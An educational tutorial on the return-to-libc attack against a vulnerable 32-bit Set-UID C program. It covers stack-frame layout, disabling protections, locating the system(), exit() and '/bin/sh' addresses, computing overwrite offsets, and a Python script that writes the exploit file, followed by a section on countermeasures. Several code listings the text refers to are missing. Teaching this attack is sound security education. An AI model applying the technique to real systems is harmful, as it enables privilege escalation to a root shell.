Using a buffer overflow attack, an attacker can cause a program to jump to shellcode and execute it. To prevent this, some operating systems, such as Fedora Linux, allow system administrators to make stacks non-executable, so jumping to shellcode on the stack causes the program to fail.
Unfortunately, this protection scheme is not foolproof. Another type of attack, the return-to-libc attack, does not need an executable stack; it does not even use shellcode. Instead, it causes the vulnerable program to jump to existing code, such as the system() function in the libc library, which is already loaded into memory.
The system function
The system function is part of the libc library. The way it works is simple: it starts a new shell process and passes its first argument to that shell as a command, which the shell then executes.
What makes system dangerous is that the invoked shell has the same effective user ID as its parent process. Therefore, if we call system("/bin/sh") in a privileged program, the invoked shell runs with that privilege, and so does every command it executes. For example, a malicious user who can make a Set-UID program call system("/bin/sh") obtains a privileged shell and can use it to harm the system.
Every function call has its own region of the stack, called an activation record (or stack frame), and this region has a simple structure. We take the frame pointer ebp as the origin. ebp points to the saved ebp value of the caller. Right above ebp (at higher addresses) is the return address, followed by the first argument of the function, then the second, the third, and so on. Right below ebp (at lower addresses) is the first local variable, then the second, the third, and so on.
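The layout described above can be sketched as a small Python model. This is only an illustration under simplifying assumptions: every argument and local variable is assumed to occupy exactly one 4-byte slot, and the helper name frame_layout is hypothetical. Real compilers may pad or reorder local variables.

```python
# Toy model of a 32-bit activation record, with ebp as the origin.
WORD = 4  # bytes per stack slot on a 32-bit machine


def frame_layout(num_args, num_locals):
    """Map each offset from ebp to a description of what is stored there.

    Assumption: each argument and local variable takes one 4-byte slot.
    """
    layout = {0: "saved ebp of the caller", WORD: "return address"}
    for i in range(num_args):
        # Arguments start right above the return address (ebp + 8).
        layout[2 * WORD + i * WORD] = f"argument {i + 1}"
    for i in range(num_locals):
        # Local variables start right below ebp (ebp - 4).
        layout[-(i + 1) * WORD] = f"local variable {i + 1}"
    return layout


if __name__ == "__main__":
    # Print the frame from the highest address to the lowest.
    for offset, what in sorted(frame_layout(2, 2).items(), reverse=True):
        print(f"ebp{offset:+d}: {what}")
```

Printing from high to low addresses mirrors the way stack diagrams are usually drawn, with arguments at the top and local variables at the bottom.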
For example, suppose we have this function:
When the function executes, its activation record looks like the picture below:
To place an argument for the target function in memory, we need to know exactly how a function's stack frame is allocated and deallocated. The compiler emits a short piece of code at the entry and at the exit of every function for this purpose; these pieces are called the function prologue and the function epilogue.
Function prologue: This assembly code is executed every time a function is invoked:
Before this code runs, the return address (denoted RA) has already been pushed onto the stack, and the stack pointer esp points to it. The first instruction, pushl %ebp, pushes the previous frame pointer (the caller's ebp) onto the stack so that the caller's frame pointer can be restored when the function returns. The second instruction sets the frame pointer ebp to the current value of the stack pointer esp, which marks the base of the new frame. The third instruction moves the stack pointer esp down by the number of bytes needed to reserve space for the function's local variables.
Function epilogue: like the prologue, the epilogue is executed every time the function returns:
The epilogue undoes what the prologue did so that the caller's context can be restored. The first instruction copies the frame pointer into the stack pointer, which releases the local variable space and leaves esp pointing at the saved ebp. The next instruction restores ebp to its previous value. The last instruction pops the return address from the stack and jumps to it.
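The effect of the prologue and epilogue on esp and ebp can be traced with a toy stack model. The sketch below is an illustration, not real machine code: the class ToyStack, the starting register values, and the return address are all made up, and the assembly mnemonics in the comments are the usual AT&T-syntax forms assumed to correspond to the three steps described above.

```python
# Toy 32-bit stack: memory is a dict from address to a 4-byte value.
WORD = 4


class ToyStack:
    def __init__(self, esp, ebp):
        self.mem = {}
        self.esp = esp
        self.ebp = ebp

    def push(self, value):
        self.esp -= WORD          # the stack grows toward lower addresses
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += WORD
        return value

    def prologue(self, local_bytes):
        self.push(self.ebp)       # pushl %ebp
        self.ebp = self.esp       # movl  %esp, %ebp
        self.esp -= local_bytes   # subl  $local_bytes, %esp

    def epilogue(self):
        self.esp = self.ebp       # movl  %ebp, %esp
        self.ebp = self.pop()     # popl  %ebp
        return self.pop()         # ret: pop the return address and jump to it


def demo():
    s = ToyStack(esp=0x1000, ebp=0x2000)  # hypothetical register values
    s.push(0x08048123)                    # the call pushed RA (made-up value)
    s.prologue(local_bytes=16)
    inside = (s.esp, s.ebp)               # registers while the function runs
    ra = s.epilogue()
    return inside, ra, s.esp, s.ebp


if __name__ == "__main__":
    inside, ra, esp, ebp = demo()
    print(hex(inside[0]), hex(inside[1]), hex(ra), hex(esp), hex(ebp))
```

After the epilogue, esp is back at the value it had before the call pushed RA, and ebp holds the caller's frame pointer again. The attack relies on this: whatever value sits in the return address slot is what the final step jumps to.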
One region of memory contains plenty of ready-made code: the region that holds the standard C library functions. On Linux this library is called libc, and it is a dynamically linked library. Most programs use functions from libc, so the libc library is loaded into memory before these programs start running.
So which function in libc can help an attacker achieve a malicious goal? Several exist, and the easiest to use is system(). The system() function simply starts a new shell and has that shell execute the string passed as its argument. We only need to pass the string "/bin/sh" to system(), and it will spawn a new privileged shell, because the parent process is a Set-UID program. Besides system(), many other libc functions can be abused in a similar way, such as execv() and setuid().
Because a return-to-libc attack is much more difficult on a 64-bit machine than on a 32-bit one, we demonstrate it on a 32-bit machine for simplicity.
Assume that we have the following program:
This program is vulnerable. First, it reads bytes from the file named badfile. Then it passes the resulting string str to the bof function, which copies str into a local variable, buffer. However, buffer has only 12 bytes of space, so a longer input overflows it.
Assume that the program has been compiled with the option -z noexecstack (which makes the stack non-executable), so we cannot inject shellcode and jump to it. This is where the return-to-libc attack comes in. The attack has three steps:
1. Find the address of the system() function
2. Find the address of the string "/bin/sh"
3. Construct the badfile content and perform the attack
For this experiment, some countermeasures need to be turned off.
/bin/sh: In Ubuntu 20.04, the /bin/sh symbolic link points to the /bin/dash shell. The dash shell has a countermeasure that drops privileges when it is executed in a Set-UID process. Therefore, we have to link /bin/sh to /bin/zsh instead.
Find the address of the system() function
In Linux, the libc library is loaded into the program's memory at runtime. When address space randomization is turned off, the library is loaded at the same address every time the same program runs (although the address can differ between programs). Therefore, we can easily find the address of system() with a debugging tool such as gdb.
First, we create an empty badfile for debugging:
Next, we compile the program with the debug flag. Remember to add the option -m32 to build a 32-bit binary, along with the options that turn off the countermeasures:
Then we make the program a Set-UID program. Note that even for the same program, changing it from a Set-UID program to a non-Set-UID program may cause the libc library to be loaded at a different location. Therefore, we must debug the target Set-UID program itself:
After that, we debug the program, set a breakpoint at the main function, run the program, and print the address:
Find the address of "/bin/sh"
Now that we have the address of the system() function, we need the address of its argument, the string "/bin/sh", since we want to call system("/bin/sh") to invoke a privileged shell.
There are many ways to do this; we use an environment variable. We define a new shell variable MYSHELL="/bin/sh" and export it so that it becomes an environment variable of the programs we run.
The location of this variable in memory can be found with the following program:
Compile the code above into a binary called prtenv. The name of this program must have the same number of characters as the name of the target program (here retlib), because the program name is pushed onto the stack before the environment variables, so names of different lengths shift the addresses of the environment variables:
Run the program to obtain the address of the string we need:
First, we need to know the distance from buffer to the ebp pointer. We can find it easily by debugging the program:
The distance is 24 bytes, and the return address is stored right above the saved ebp, so the address of system(), which must overwrite the return address, goes at offset 24 + 4 = 28 of the input string.
After the function epilogue of bof runs, the stack pointer is at the address right above where the return address was stored. Execution then jumps to the function prologue of system(). Its first instruction pushes the previous ebp onto the stack, which moves esp down by 4 bytes, back to the slot at offset 28. The second instruction of the prologue then sets ebp to esp. From that point on, the activation record structure tells us that the return address of system() sits right above ebp and that the function arguments sit above the return address, from first to last. We conclude that the address of "/bin/sh" must be placed at offset 28 + 4 + 4 = 36 of the input.
After system() returns, the program would jump to an invalid address and crash unless we supply a return address for system(). Therefore, we find the address of the exit function (the same way we found the address of system()) and place it at offset 28 + 4 = 32 of the input.
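The arithmetic in this analysis can be captured in a few lines of Python. This is a sketch for checking the offsets only; the function name ret2libc_offsets and the dictionary keys are hypothetical, and the value 24 is the buffer-to-ebp distance found in the debugging step above.

```python
WORD = 4  # size of a saved register or an address on a 32-bit machine


def ret2libc_offsets(buffer_to_ebp):
    """Return the input offsets of the three addresses used by the attack."""
    system_off = buffer_to_ebp + WORD  # overwrites the return address of bof
    exit_off = system_off + WORD       # read by system() as its return address
    binsh_off = exit_off + WORD        # read by system() as its first argument
    return {"system": system_off, "exit": exit_off, "binsh": binsh_off}


print(ret2libc_offsets(24))  # {'system': 28, 'exit': 32, 'binsh': 36}
```

If the compiler lays out bof differently, only the buffer-to-ebp distance changes; the 4-byte steps between the three slots stay the same.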
The analysis above can be visualized in this picture.
Construct the badfile content and perform the attack
The last step is to construct the badfile content based on our analysis.
We use a Python program to generate it:
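A minimal sketch of such a generator is shown here. The offsets 28, 32, and 36 come from the analysis above. Everything else is an assumption made for illustration: the three addresses are placeholders that must be replaced with the values printed by gdb and prtenv on the target machine, and the 300-byte file size and the 0xAA filler byte are arbitrary choices.

```python
import struct

# Offsets derived in the analysis above (distance from buffer to ebp is 24).
SYSTEM_OFFSET = 28
EXIT_OFFSET = 32
BINSH_OFFSET = 36


def build_payload(system_addr, exit_addr, binsh_addr, size=300, filler=0xAA):
    """Return the bytes to store in badfile (size and filler are assumptions)."""
    content = bytearray([filler] * size)
    # "<I" packs an unsigned 32-bit integer in little-endian order (x86).
    content[SYSTEM_OFFSET:SYSTEM_OFFSET + 4] = struct.pack("<I", system_addr)
    content[EXIT_OFFSET:EXIT_OFFSET + 4] = struct.pack("<I", exit_addr)
    content[BINSH_OFFSET:BINSH_OFFSET + 4] = struct.pack("<I", binsh_addr)
    return bytes(content)


if __name__ == "__main__":
    # Placeholder addresses: replace them with the values found on your system.
    payload = build_payload(0x11111111, 0x22222222, 0x33333333)
    with open("badfile", "wb") as f:
        f.write(payload)
```

The filler byte must be nonzero, because a zero byte would end the string copy before the three addresses are reached.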
Finally, we run the vulnerable program and observe the result:
Several countermeasures make this attack harder.
The first is address space randomization. The operating system randomizes the starting addresses of the stack, the heap, and shared libraries each time a program runs, so it is much harder to guess the address of the system() function and the other addresses the attack needs.
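The second is StackGuard, a protection against buffer overflows implemented by the gcc compiler. When this protection is enabled, an overflow that overwrites the return address is detected before the function returns, so the attack described here does not work.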
Next, the /bin/dash shell has a countermeasure against being executed in a Set-UID process. If dash is executed in a Set-UID process, it immediately changes the effective user ID to the process's real user ID, essentially dropping its privilege.
The last one is ASCII armoring. With it, the addresses of all system libraries (e.g. libc) contain a NULL byte (0x00). When the attack input is copied by a string function such as strcpy, the copy stops at this NULL byte, so everything after it never reaches the stack and the attack fails.
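The truncation caused by ASCII armoring can be illustrated with a small model of how strcpy treats its source. This is a sketch, not a reimplementation of libc: the helper c_strcpy_bytes is hypothetical, and both addresses are made-up values chosen so that the library address has a zero top byte.

```python
import struct


def c_strcpy_bytes(src):
    """Model which bytes strcpy copies: everything before the first NUL byte.

    The real strcpy also writes one terminating NUL after these bytes.
    """
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


# Hypothetical addresses, chosen only to illustrate the effect.
ARMORED_SYSTEM = 0x00123456  # library address whose top byte is zero
EXIT_ADDR = 0xB7E01234

payload = (b"A" * 28
           + struct.pack("<I", ARMORED_SYSTEM)  # bytes 56 34 12 00
           + struct.pack("<I", EXIT_ADDR))
copied = c_strcpy_bytes(payload)

print(len(payload), len(copied))  # 36 31
```

In this model the copy ends inside the first address, so the exit address and the "/bin/sh" pointer that should follow it are never written to the stack.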